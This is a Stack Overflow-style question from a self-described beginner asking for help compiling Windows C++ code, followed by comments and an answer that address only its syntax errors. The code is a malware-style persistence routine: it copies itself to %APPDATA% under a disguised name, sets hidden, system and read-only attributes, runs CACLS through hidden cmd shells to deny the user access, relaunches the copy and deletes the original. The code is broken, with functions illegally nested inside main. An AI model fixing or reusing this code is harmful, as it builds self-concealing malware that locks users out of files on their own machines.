# self replicate, protect and destruct local function definitions are illegal

Tags: c++, visual-studio

i try to compile  this code which has no other functions except:
after i run > copy itself to other folder/path then delete itself and protect.

I want to learn more about how these things work but I get some errors  i can't fix so I need some help to build it :)

here is the list of errors :

Error   C1075   '{': no matching token found

Error   C2601   'WorkerID': local function definitions are illegal

Error   C2601   'SelfDefense': local function definitions are illegal

Error   C2601   'IsElevated': local function definitions are illegal

Error   C2601   'Delete': local function definitions are illegal

Error   C2601   'Copy': local function definitions are illegal

Error   C2601   'CheckPath': local function definitions are illegal

Error   C2601   'CheckMutex': local function definitions are illegal

i have zero experience with c++ so every attempt to fix  this I got more errors.

```
#define _UNICODE

#include "App.h"
#include "Myresearchconsoleapp/Entry.h"
#include "Myresearchconsoleapp/Process.h"
#include <windows.h>
#include <TCHAR.H>
#include <thread>
#include <sddl.h>
#include <stdio.h>
#include <aclapi.h>
#include <stdlib.h>
#include <Shlwapi.h>
#define STRICT
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
#pragma comment(linker, "/SECTION:.text,EWR")

#define STRLEN(x)(sizeof(x) / sizeof(TCHAR) - 1)


int main(int argc, char **argv) {
   using namespace mystudyapp;

   Process process(argc, argv);
   const Entry::Id entry = Entry::get(process);
   if (entry) {
       return Entry::exec(process, entry);
   }

   bool SelfDefense()
   {

       return TRUE;
   }



   int Delete(TCHAR* path) {
       TCHAR DelCom[MAX_PATH + 1];
       wsprintfW(DelCom, L"/c timeout -t 2 && del \"%s\"", path);
       ShellExecuteW(0, L"open", L"cmd.exe", DelCom, 0, SW_HIDE);
       std::exit(0);
   }

   int Copy(TCHAR* CopyPth, TCHAR* CruPath, TCHAR* Username) {
       STARTUPINFO si;
       TCHAR CACLS[1024];
       TCHAR CACLS2[1024];
       memset(&si, 0, sizeof(si));
       si.cb = sizeof(si);
       PROCESS_INFORMATION pi;
       memset(&pi, 0, sizeof(pi));
       CopyFile(CruPath, CopyPth, true);
       SetFileAttributes(CopyPth, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
       wsprintfW(CACLS, L"/c CACLS \"%s\" /E /P %s:N", CopyPth, Username); 
       ShellExecuteW(0, L"open", L"cmd.exe", CACLS, 0, SW_HIDE);
       wsprintfW(CACLS2, L"/c Echo Y| CACLS \"%s\" /P %s:R", CopyPth, Username);
       ShellExecuteW(0, L"open", L"cmd.exe", CACLS2, 0, SW_HIDE); 
       CreateProcess(NULL, CopyPth, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
       Delete(CruPath);
   }

   int CheckMutex() {
       WCHAR MUTEX[] = { L"Global\\Mutex01" };
       HANDLE hMutex = CreateMutexW(0, 0, MUTEX);
       if ((GetLastError() == ERROR_ALREADY_EXISTS) || (GetLastError() == ERROR_ACCESS_DENIED)) {
           CloseHandle(hMutex);
           std::exit(0);
       }
       return 0;
   }

   BOOL IsElevated() {
       BOOL fRet = FALSE;
       HANDLE hToken = NULL;
       if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
           TOKEN_ELEVATION Elevation;
           DWORD cbSize = sizeof(TOKEN_ELEVATION);
           if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
               fRet = Elevation.TokenIsElevated;
           }
       }
       if (hToken) {
           CloseHandle(hToken);
       }
       return fRet;
   }



   int CheckPath() {
       TCHAR Username[256]; 
       TCHAR AppData[1024 + 1]; 
       BOOL Admin = IsElevated(); 
       TCHAR CruPath[MAX_PATH + 1]; 

       ExpandEnvironmentStringsW(L"%USERNAME%", Username, 256); 
       ExpandEnvironmentStringsW(L"%APPDATA%\\mystudyapp.exe", AppData, 1024); 
       GetModuleFileName(NULL, CruPath, STRLEN(CruPath)); 

       if (_tcscmp(CruPath, AppData) != 0) { 

           Copy(AppData, CruPath, Username); 
       }
       else { 
           CheckMutex(); 
           if (SelfDefense()) {} 
           return 0;
       }
   }


   char* WorkerID() {
       DWORD VolumeSerialNumber = 0;
       GetVolumeInformation(L"c:\\", NULL, NULL, &VolumeSerialNumber, NULL, NULL, NULL, NULL);
       char procID[20];
       sprintf(procID, "%d", VolumeSerialNumber);

       return procID;


       App app(&process);
       return app.exec();
   }
```

Comment: [Here's a list of good books about C++](https://stackoverflow.com/questions/388242/the-definitive-c-book-guide-and-list/388282#388282). Please get a couple and start reading from the beginning. If you wanted to learn a new spoken language, would you just dive into it and guess about grammar, spelling and pronunciation? I hope not. It's the same with programming languages.

Comment: Really impossible to help unless you a) post the missing code Entry.h Process.h etc. b) indicate which lines the errors apply to. And a piece of advice, don't try to run before you can walk, spend some time learning the language and learning to use your compiler, before trying something like this.

Comment: why did you put everything inside `main`?

Answer (score 0):

OK I take back my comment above. You have a missing `}` at the end of main

```
int main(int argc, char **argv) {
   using namespace mystudyapp;

   Process process(argc, argv);
   const Entry::Id entry = Entry::get(process);
   if (entry) {
       return Entry::exec(process, entry);
   }
```

should be

```
int main(int argc, char **argv) {
   using namespace mystudyapp;

   Process process(argc, argv);
   const Entry::Id entry = Entry::get(process);
   if (entry) {
       return Entry::exec(process, entry);
   }
}
```

Comment: The problems run deeper than that. The last two statements in the shown code uses the `process` variable, so it all seem to be intended to be one big function with nested functions inside it. If I would hazard a guess, it seems that the OP thinks that the `main` function is a class of some kind, and a general lack of knowledge mixed with unattentiveness or lack of will to attempt to figure out what the error message mean (the majority of them about the nested functions should be quite clear).

Comment: @Someprogrammerdude Strange. I think it's pretty clear that the OP didn't write this code (zero experience with C++) but nested functions are not allowed in C++ (except maybe as a non-standard extension). So where did the code come from? In any case the OP is clearly taking on too much, too quickly.